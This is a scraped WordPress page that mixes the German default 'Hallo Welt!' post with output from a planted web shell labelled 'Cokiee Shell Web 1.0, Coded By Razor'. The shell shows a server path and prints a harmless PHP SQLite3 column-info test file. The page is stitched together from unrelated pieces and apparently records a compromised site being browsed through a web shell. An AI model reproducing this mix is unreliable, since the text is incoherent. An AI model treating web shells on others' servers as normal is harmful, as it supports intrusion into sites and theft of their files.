Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/sqlite3/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/sqlite3/tests/sqlite3_19_columninfo.phpt |
--TEST-- SQLite3 columnType and columnName --SKIPIF-- <?php require_once(dirname(__FILE__) . '/skipif.inc'); ?> --FILE-- <?php require_once(dirname(__FILE__) . '/new_db.inc'); define('TIMENOW', time()); echo "Creating Table\n"; var_dump($db->exec('CREATE TABLE test (time INTEGER, id STRING)')); echo "INSERT into table\n"; var_dump($db->exec("INSERT INTO test (time, id) VALUES (" . TIMENOW . ", 'a')")); var_dump($db->exec("INSERT INTO test (time, id) VALUES (" . TIMENOW . ", 'b')")); echo "SELECTING results\n"; $result = $db->query("SELECT * FROM test ORDER BY id ASC"); while ($row = $result->fetchArray(SQLITE3_NUM)) { $totalColumns = $result->numColumns(); for ($i = 0; $i < $totalColumns; $i++) { echo "Name: " . $result->columnName($i) . " - Type: " . $result->columnType($i) . "\n"; } } $result->finalize(); echo "Closing database\n"; var_dump($db->close()); echo "Done\n"; ?> --EXPECTF-- Creating Table bool(true) INSERT into table bool(true) bool(true) SELECTING results Name: time - Type: 1 Name: id - Type: 3 Name: time - Type: 1 Name: id - Type: 3 Closing database bool(true) Done
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare